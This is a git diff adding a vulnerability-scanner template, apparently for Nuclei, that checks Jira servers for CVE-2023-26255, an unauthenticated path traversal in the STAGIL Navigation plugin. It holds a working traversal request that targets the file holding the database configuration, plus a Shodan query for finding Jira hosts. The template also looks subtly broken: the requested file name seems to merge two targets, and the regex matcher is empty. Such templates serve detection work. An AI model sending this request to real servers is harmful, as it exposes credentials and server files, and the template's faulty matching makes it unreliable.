diff --git a/cves/2023/CVE-2023-26255.yaml b/cves/2023/CVE-2023-26255.yaml new file mode 100644 index 0000000000..af18c3c02d --- /dev/null +++ b/cves/2023/CVE-2023-26255.yaml @@ -0,0 +1,36 @@ +id: CVE-2023-26255 + +info: + name: STAGIL Navigation for Jira - Menu & Themes - Local File Inclusion + author: DhiyaneshDK + severity: high + description: | + An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjCustomDesignConfig endpoint, it is possible to traverse and read the file system. + reference: + - https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26255.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-26255 + classification: + cve-id: CVE-2023-26255 + metadata: + shodan-query: "title:Jira" + tags: cve,cve2023,lfi,jira,cms,atlassian + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime" + + matchers-condition: and + matchers: + - type: regex + regex: + - "" + + - type: word + part: header + words: + - '$textMime' + + - type: status + status: + - 200